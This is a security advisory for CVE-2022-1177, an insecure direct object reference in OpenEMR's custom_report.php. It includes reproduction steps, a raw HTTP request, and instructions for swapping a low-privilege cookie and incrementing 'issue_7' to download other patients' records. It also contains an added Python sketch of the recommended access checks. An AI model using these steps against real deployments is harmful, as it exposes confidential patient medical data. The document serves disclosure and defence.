
CVE-2022-1177: Accounting User Can Download Patient Reports in openemr

Accounting User Can Download Patient Reports in openemr in GitHub repository openemr/openemr prior to 6.1.0.


Vulnerability Type

Insecure Direct Object Reference

Affected URL

https://localhost/openemr/interface/patient_file/report/custom_report.php

Affected Parameters

“issue_7”

Authentication Required?

Yes

Issue Summary

Non-privileged users (accounting & front-office) can download patient reports containing medical reports and documents by sending a request to a vulnerable end-point. No access control is enforced on this end-point, so any authenticated user of OpenEMR can download patient records simply by changing the “issue_7” parameter to any valid number. By incrementing this value, an unauthorized user can download patient records.

Recommendation

Implement an ACL check to ensure that only authorized users of the OpenEMR system are able to download patient documents from the vulnerable end-point.
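The kind of check recommended above, as an added Python sketch (not OpenEMR's code or its actual patch): it parses the issue_N fields in the format shown in this advisory and denies by default, checking the caller's role first. It goes one step beyond the recommendation by also verifying that each referenced number belongs to the patient active in the session. The role names, the ownership table and the function names are assumptions made for illustration.

```python
from urllib.parse import parse_qs

# Hypothetical role permissions and record ownership (constructed sample data,
# not OpenEMR's real ACL tables or schema).
CAN_READ_CLINICAL = {"admin": True, "physician": True,
                     "accounting": False, "front-office": False}
RECORD_OWNER = {14: 1, 15: 2}  # referenced number -> patient id

def referenced_records(body):
    """Extract the numbers carried in issue_N fields, e.g. issue_7=%2F14%2F -> [14]."""
    numbers = []
    for field, values in parse_qs(body, keep_blank_values=True).items():
        if not field.startswith("issue_"):
            continue
        for value in values:
            for part in filter(None, value.split("/")):
                if not (part.isascii() and part.isdigit()):
                    raise ValueError(f"non-numeric reference in {field}: {part!r}")
                numbers.append(int(part))
    return numbers

def authorize_report(role, session_patient_id, body):
    """Return (allowed, reason). Deny by default: check the role, then each object."""
    try:
        records = referenced_records(body)
    except ValueError as exc:
        return False, str(exc)
    # Function-level check: unknown roles get no clinical access.
    if records and not CAN_READ_CLINICAL.get(role, False):
        return False, f"role {role!r} may not read clinical records"
    # Object-level check: every referenced number must belong to the active patient.
    for number in records:
        if RECORD_OWNER.get(number) != session_patient_id:
            return False, f"record {number} is not part of the active patient's chart"
    return True, "ok"

# Constructed request body in the format shown in this advisory.
SAMPLE = ("include_demographics=demographics&include_billing=billing&pdf=1"
          "&issue_8=%2F&issue_7=%2F14%2F&issue_6=%2F")

if __name__ == "__main__":
    for role, patient in [("admin", 1), ("accounting", 1), ("admin", 2)]:
        print(role, patient, authorize_report(role, patient, SAMPLE))
```

Both checks run on the server for every request, so changing the number in the request body cannot widen what a session is allowed to read.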

Credits

Aden Yap Chuen Zhen
Rizan, Sheikh
Ali Radzali

Issue Reproduction

Log in to OpenEMR as Admin and capture the POST request to the following end-point:

https://localhost/openemr/interface/patient_file/report/custom_report.php

In Burp, the cookie “OpenEMR” and the parameter “issue_7” in the HTTP POST request can be tampered with.

Host: 192.168.0.141
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Origin: http://192.168.0.141
Connection: close
Referer: http://192.168.0.141/openemr/interface/patient_file/report/patient_report.php
Cookie: OpenEMR=E6toaL3R-180fA2-MIw80a-G7PJPCapZxrTYIzY%2Cofj5CXEG
Upgrade-Insecure-Requests: 1

include_demographics=demographics&include_billing=billing&pdf=1&issue_8=%2F&issue_10=%2F&issue_7=%2F14%2F&issue_6=%2F&issue_9=%2F&issue_11=%2F&issue_12=%2F

Replace the “OpenEMR” cookie with the Accountant cookie and increment the “issue_7” parameter to any valid number, e.g. “issue_7=/15/”, to access patient documents.

References

  • This bug was already reported and fixed by the OpenEMR project team. Kindly reach out to Brad in case of questions. Details of the patch are at: https://www.open-emr.org/wiki/index.php/OpenEMR_Patches
